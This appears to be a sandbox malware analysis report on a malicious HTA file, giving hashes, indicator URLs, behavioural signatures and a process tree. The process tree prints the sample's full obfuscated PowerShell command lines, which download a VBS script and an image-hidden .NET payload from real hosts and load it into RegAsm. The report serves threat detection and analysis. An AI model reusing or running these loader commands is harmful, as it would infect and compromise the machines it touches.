Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
15-10-2024 01:50
Static task
static1
Behavioral task
behavioral1
Sample
8fbf6165b0751a47bf9842011e82c4a7715cc879fd7272b45ab549df6e813e46.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
8fbf6165b0751a47bf9842011e82c4a7715cc879fd7272b45ab549df6e813e46.hta
Resource
win10v2004-20241007-en
General
-
Target
8fbf6165b0751a47bf9842011e82c4a7715cc879fd7272b45ab549df6e813e46.hta
-
Size
163KB
-
MD5
52bb72daa6c16c09d4298bd59e12b7d9
-
SHA1
2e4aef7df584acaadb5a6e555d6e2f40ae12b6f1
-
SHA256
8fbf6165b0751a47bf9842011e82c4a7715cc879fd7272b45ab549df6e813e46
-
SHA512
1a6a1c54ceed1d004e32504bb473d2525dcff1974d8618af871252e4da7f3992ca87acc935a74f78cd6c14f172142ccfeee9bcb47104ea50a704fe37750d4ee4
-
SSDEEP
48:7oa+awjz7eWLB23EfAq6kfAKV6/HQ2UBW1++izpyHBfHLPy3JofufAYfAkhjQ/od:Ea+n7QbzVsdi9yOPtksVKLSAT
Malware Config
Extracted
https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20
https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 2764 pOwerSHelL.EXe 6 2556 powershell.exe 7 2556 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 3016 powershell.exe 2556 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 2764 pOwerSHelL.EXe 1996 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 5 raw.githubusercontent.com 6 raw.githubusercontent.com 7 raw.githubusercontent.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pOwerSHelL.EXe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2764 pOwerSHelL.EXe 1996 powershell.exe 2764 pOwerSHelL.EXe 2764 pOwerSHelL.EXe 3016 powershell.exe 2556 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2764 pOwerSHelL.EXe Token: SeDebugPrivilege 1996 powershell.exe Token: SeDebugPrivilege 3016 powershell.exe Token: SeDebugPrivilege 2556 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2896 wrote to memory of 2764 2896 mshta.exe 28 PID 2896 wrote to memory of 2764 2896 mshta.exe 28 PID 2896 wrote to memory of 2764 2896 mshta.exe 28 PID 2896 wrote to memory of 2764 2896 mshta.exe 28 PID 2764 wrote to memory of 1996 2764 pOwerSHelL.EXe 30 PID 2764 wrote to memory of 1996 2764 pOwerSHelL.EXe 30 PID 2764 wrote to memory of 1996 2764 pOwerSHelL.EXe 30 PID 2764 wrote to memory of 1996 2764 pOwerSHelL.EXe 30 PID 2764 wrote to memory of 2400 2764 pOwerSHelL.EXe 31 PID 2764 wrote to memory of 2400 2764 pOwerSHelL.EXe 31 PID 2764 wrote to memory of 2400 2764 pOwerSHelL.EXe 31 PID 2764 wrote to memory of 2400 2764 pOwerSHelL.EXe 31 PID 2400 wrote to memory of 1292 2400 csc.exe 32 PID 2400 wrote to memory of 1292 2400 csc.exe 32 PID 2400 wrote to memory of 1292 2400 csc.exe 32 PID 2400 wrote to memory of 1292 2400 csc.exe 32 PID 2764 wrote to memory of 2848 2764 pOwerSHelL.EXe 34 PID 2764 wrote to memory of 2848 2764 pOwerSHelL.EXe 34 PID 2764 wrote to memory of 2848 2764 pOwerSHelL.EXe 34 PID 2764 wrote to memory of 2848 2764 pOwerSHelL.EXe 34 PID 2848 wrote to memory of 3016 2848 WScript.exe 35 PID 2848 wrote to memory of 3016 2848 WScript.exe 35 PID 2848 wrote to memory of 3016 2848 WScript.exe 35 PID 2848 wrote to memory of 3016 2848 WScript.exe 35 PID 3016 wrote to memory of 2556 3016 powershell.exe 37 PID 3016 wrote to memory of 2556 3016 powershell.exe 37 PID 3016 wrote to memory of 2556 3016 powershell.exe 37 PID 3016 wrote to memory of 2556 3016 powershell.exe 37
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\8fbf6165b0751a47bf9842011e82c4a7715cc879fd7272b45ab549df6e813e46.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2896 -
C:\Windows\SysWOW64\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe"C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1996
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qegkpqd1.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2400 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA5E1.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA5E0.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:1292
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2556
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5508d5335c3c980b1bc53421e71bc33db
SHA15f00fc9c5d1ac9dfcaef4706b80ccf3b9cebb2b8
SHA256271be52e6f69b45129f82eb3542c9ab84aa2f6b8464a251ea523cff248e2dfb9
SHA51256b82c5d9022c4cbc02ee05f622b4752a4d20b6f0ef5ccd26816bb1ff1b3ad843a92a0310889dcd80c9dd11fcb9cafe9c78cedfa8b3ef004dcb5b178a5560cc1
-
Filesize
3KB
MD52c7a1b4b35ccc4bcf0bda44c54e9d850
SHA1d423308e9d49ab0e71ddb1091ef42e2362d8ad8a
SHA2560dd57f3b7b5adf26c2fd82fa98f562310f96e753e6c32953e0c2ae07a90b3e65
SHA512bcf4d430c3316b44bc5b408890fc473095a68c0a5b6d96274ab26f6510371db76e82b0d8918968d477334ec3f3da1a1cfd64bf2a0ac5a6128b7568cb102971b7
-
Filesize
7KB
MD50729cb72466a03bf7b4aa9ea3a843b6a
SHA1a022e1e8a9b0616112fa06acc22905c2dc3c3081
SHA256315506b08f73cf652c22eb7cbb1e9a61ff3e85735aac61eee855695692a75f59
SHA512f79b93225c344bb5adee376b025fb5636abd78dd26456a002280aba6a882920801d87088a5a64e2ec5c4d7d5be8e34cb090acdabde1ac452c7335cb95886043b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD50c808860991258c1070018a28ecb23b2
SHA17bf7233df9ef94086ab656ff4338dd421a3a054c
SHA2561b9989922a23d0f0cb48ee322b4c699ff3a8fe03919f8b650979e59ace4fd48f
SHA512e5d81357e1709a5a954844e67f1ae4d77423124be02062c181643af8767822384d6c4c792d73e6fc4ba04dac1e89d5af2b4a6c35759e25cc64128924427dcd63
-
Filesize
191KB
MD55a71149a9c997cdcb94f1a84860417f7
SHA19d80f853425ae99d844a70cebaa59aee73c537d1
SHA256ff6b47d315645fddc632876ae60a1a33a3e9138ceef8a073d2fe8779208f7d8c
SHA512448d914aa714c3deab84218beda6a3e94a9a5b8a5d912178f72a2ea82c73ad6ddb86a8e3443785fdce8d9fd876c5df7c26cd878dfa33f432e38ad62ff0e91c1b
-
Filesize
652B
MD5428d0da4907790c174505f19bebaff1d
SHA1472eb5f582b925fb9c184b8f83f43b2b10d16f8a
SHA25669295b50fe09699464974c8bedda18278ecc8a15d0e20e7023a7b3db7d1b0f4c
SHA51238fc393fc1f736429154ada60f677fd3f459a9fb34764f7adc685528aff5f3f6c05dcc039c4dfc30131efd5f46b0da8dab3ae8cb690013c381696ac5bb5b79b8
-
Filesize
475B
MD5cf949a7e29735ad6b8a09c0cc0beae97
SHA1dc92e9e10f38aeab463c00e9d75c8dbf2079c789
SHA256445f4cadd6d07292e03d69e62fac1ab63ad9e3ac760e46d367bea04a4604b7b4
SHA51229c63c01aed8621de822517bacfe90130ef54c77a73edfc2036df8a1cd182b1f6a4acfa9742b81f7276a99cf01d98f012a5a8c06f87b4c1620f92d2cceb36041
-
Filesize
309B
MD583cecd001d08c11ae5219903d15697b9
SHA132e0819ad0836b190776e46d95e15619d424211b
SHA256e25cf01b77ba60a2e64d868337131584cd1c7c287652cd90844aae55d0e7aaba
SHA5122c6f4d94e5275f24fa74e0869e801a2cde2ebf3a3fe6f37af4b102d7239eee2d098e9f6239b007c1910e9b7fbae76130c9426b8958f3c43ff52f27579eeb3b88